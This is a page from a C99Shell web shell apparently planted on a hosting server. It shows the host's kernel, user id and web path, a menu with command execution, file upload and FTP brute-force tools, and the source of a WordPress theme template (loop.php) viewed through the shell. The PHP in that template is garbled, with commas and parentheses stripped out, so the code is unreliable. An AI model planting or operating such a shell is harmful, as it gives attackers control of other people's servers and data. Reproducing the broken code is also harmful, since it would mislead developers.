!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache. PHP/5.6.40-67+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux hosting1.erectacloud.it 5.4.0-182-generic #202-Ubuntu SMP Fri Apr 26 12:29:36 UTC
2024 x86_64
 

uid=5229(web473) gid=5117(client172) groups=5117(client172),5002(sshusers) 

Safe-mode: OFF (not secure)

/var/www/clients/client172/web473/web/OLD_WP/wp-content/themes/kingsize/   drwxr-xr-x
Free 181.21 GB of 490.84 GB (36.92%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     loop.php (7.93 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
        <?php
        
//All SAVED Theme OPTION VALUES
        
global $data;
        
?>
        <!-- Main wrap -->
        <div id="main_wrap">

            <!-- Main -->
                <div id="main">
                
                  <!--Page title start-->
                  <?php if ( $data['wm_show_page_post_headers'] == "" || $data['wm_show_page_post_headers'] == "0" ) { ?>
                    <div class="row header">
                        <div class="eight columns">
                            <h2 class="title-page"><?php if(is_search()) { ?>
                    <?php echo $wp_query->found_posts?> <?php _e'Search Results for''kslang' ); ?> "<?php echo esc_html($s); ?>"
                        <?php } elseif(is_category()) { ?>
                            <?php single_cat_title(); ?>
                        <?php } elseif(is_tag()) { ?>
                            <?php single_tag_title(); ?>
                        <?php } elseif(is_author()) { ?>
                            <?php wp_title(''); ?>'s <?php _e'Posts''kslang' ); ?>
                        <?php } elseif(is_archive()) { ?>
                            <?php _e'Archive:''kslang' ); ?> <?php wp_title(); ?>
                    <?php ?></h2>
                        </div>
                    </div>
                <?php } else { ?>
                    <div class="row header">
                        <div class="eight columns">
                            <h2 class="title-page"></h2>
                        </div>
                    </div>
                <?php ?>                    
                <!-- Ends Page title --> 
                
                <!--Sample Page Start-->
                <div class="row">
                    <div class="<?php if ( $data['wm_page_sidebar_enabled'] == "1"  && get_post_meta($postParentPageID'page_sidebar_hide'true ) == "" ) {?>blog<?php }  else { ?>twelve columns  mobile-twelve<?php }?>">
    
                        <?php if ( $data['wm_page_sidebar_enabled'] == "1"  && get_post_meta($postParentPageID'page_sidebar_hide'true ) == "" ) {?>
                        <div class="blog_block_left">
                        <?php ?>

                        <?php global $query_stringquery_posts$query_string);  if (have_posts()) : while (have_posts()) : the_post(); ?>

                          <!-- Post -->
                          <div class="post">
                               <h3 class="post_title">
                                  <a href="<?php the_permalink(); ?>" title="<?php the_title(); ?>">
                                  <img alt="date" src="<?php echo get_template_directory_uri();?>/images/calendar.png">
                                <?php the_time(get_option('date_format')); ?> -  
                                  <?php the_title(); ?></a>
                              </h3>
                                     
                                 <!-- Post details -->
                               <div class="blog_date">
                                    <?php 
                                     
if( $data['wm_date_enabled'] == '1' ) { //data is enabled
                                     
?>
                                         <ul class="icon-list">
                                             <li><img alt="date" src="<?php echo get_template_directory_uri();?>/images/calendar.png"></li>
                                             <li><?php the_time(get_option('date_format')); ?></li>
                                        </ul>
                                     <?php
                                     
}     
                                     
?>        
                                     <?php //edit_post_link('edit post', ', ', ''); ?>
                                    <?php 
                                     
if( $data['wm_meta_comments_enabled'] == '1' ) { //data is enabled
                                     
?>
                                        <ul class="icon-list right text-right">
                                            <li><img alt="date" src="<?php echo get_template_directory_uri();?>/images/comment.png"></li>
                                            <li><a href="<?php the_permalink(); ?>#comments" class="underline"><?php comments_number(__('No comments''kslang'), __('1 comment''kslang'), __('% comments''kslang')); ?></a></li>
                                        </ul>
                                     <?php
                                     
}     
                                     
?>    
                                </div>
                                
                                <!-- Post thubmnail -->    
                                <?php
                                    
//show the image in lightbox                                    
                                        
$show_image_lightbox get_post_meta($post->ID'kingsize_featured_img_lightbox'true );
    
                                    
//POST featured image height
                                        
if(get_post_meta($post->ID'kingsize_post_featured_img_height'true ))
                                            
$post_featured_img_height get_post_meta($post->ID'kingsize_post_featured_img_height'true );
                                        else
                                            
$post_featured_img_height null;
    
                                     
//Sidebar enabled    
                                        
if ( $data['wm_sidebar_enabled'] == "1"   && get_post_meta($postParentPageID'page_sidebar_hide'true ) == ""
                                            
$post_featured_img_width 680;
                                        else
                                            
$post_featured_img_width 680;//showing full width
                                                
                                        
if(has_post_thumbnail()): // POST has thumbnail
    
                                            
$org_img_url wp_get_attachment_urlget_post_thumbnail_id$post->ID ) );
                                            
$attachment_id =  get_post_thumbnail_id($post->ID);

                                            
$url_post_img aq_resizewp_get_attachment_url($attachment_id), $post_featured_img_width$post_featured_img_heighttruetruetrue );

                                            
$image aq_resize(wp_get_attachment_url(get_post_thumbnail_id(get_the_id())),  $post_featured_img_width$post_featured_img_heighttruefalsetrue); 
                                                
                                            
//wm_image_resize($post_featured_img_width,$post_featured_img_height, wp_get_attachment_url($attachment_id));
 

                                            
if($show_image_lightbox=='enable')
                                                echo 
'<div class="blog_img"><a href="'.$org_img_url.'" class="image lightbox_blog" title="'.get_the_title().'" rel="gallery"><img src="'.$image[0].'" title="'.get_the_title().'" alt="'.get_the_title().'" width="'.$image[1].'" height="'.$image[2].'"/></a></div>';
                                            else 
                                                echo 
'<div class="blog_img"><a href="'.get_permalink$postid ).'" class="image lightbox_not" title="'.get_the_title().'"><img src="'.$image[0].'" title="'.get_the_title().'" alt="'.get_the_title().'" width="'.$image[1].'" height="'.$image[2].'"/></a></div>';
                                            
                                        endif;
                                
?>
                                <!-- END Post thubmnail -->
    
                                <!-- POST Content -->
                                <div class="blog_text">
                                <?php 
                                    
///Enable the gallery with next previous of images
                                    
if( $data['wm_enable_rtf_excerpts'] == '0' ) {
                                        echo 
get_the_content_with_formatting($data['wm_read_more_text']);
                                    }        
                                    elseif ( 
$data['wm_blog_img_gallery_nxt_prev'] == "1" ) {                                
                                        
$post_content get_content();
                                        
//$post_content = apply_filters('the_content', $post_content);
                                        //$post_content = str_replace(']]>', ']]&gt;', $post_content);
                                        
$post_content str_replace("<a ","<a rel='prettyPhoto[gallery]' ",$post_content);
    
                                        
$post_content str_replace("(more...)",$data['wm_read_more_text'],$post_content);
                                        
$post_content str_replace("(more&#8230;)",$data['wm_read_more_text'],$post_content);
                                        echo 
$post_content;
                                    }
                                    else {
                                        
$post_content get_content(); 
                                        
$post_content str_replace("(more...)",$data['wm_read_more_text'],$post_content);
                                        
$post_content str_replace("(more&#8230;)",$data['wm_read_more_text'],$post_content);
    
                                        echo 
$post_content;
                                    }
                                    
?>
                                </div>
                                <!-- POST Content END -->
                                
                        </div>
                        <!-- Post ends here -->
                        
                        <?php endwhile; ?>
                        <?php else : ?>
                        
                         <div class="post">
                          <div id="page_search">
                              <p><?php _e('Nothing found. Please try using the below search box or site index to locate what you\'re looking for.''kslang'); ?></p>
                            <?php get_search_form();?>
                            </div>
                          </div>
                        <?php endif; ?>
                        
                        <div id="pagination-container">
                        
                            <!-- Pagination -->
                            <?php if (  $wp_query->max_num_pages ) : $paged intval(get_query_var('paged')); ?>
                                <div id="pagination">                                        
                                    <div class="older"><?php next_posts_link__('&larr; Older entries''kslang') ); ?></div>
                        
                                    <?php if($paged 1) :?>
                                        <div class="newer"><?php previous_posts_link__('Newer entries &rarr;''kslang') ); ?></div>
                                    <?php endif; ?>
                                </div><!-- #nav-below -->
                            <?php endif; ?>
                            <!-- End Pagination -->                        
                        
                        </div>

                 </div>
                 <!-- Content ends here -->

                <!-- Sidebar begins here -->
                <?php if ( $data['wm_page_sidebar_enabled'] == "1"  && get_post_meta($postParentPageID'page_sidebar_hide'true ) == "" ) {?>
                </div><!-- end DIV .blog_block_left -->
                
                <div id="sidebar" class="blog_block_right"> <!-- Sidebar go here -->
                    <?php if ( !function_exists('generated_dynamic_sidebar') || !generated_dynamic_sidebar("Pages Sidebar") ) : ?><?php endif; ?>
                </div>
                <?php ?>
                <!-- Sidebar ends here--> 

<?php get_footer(); ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0345 ]--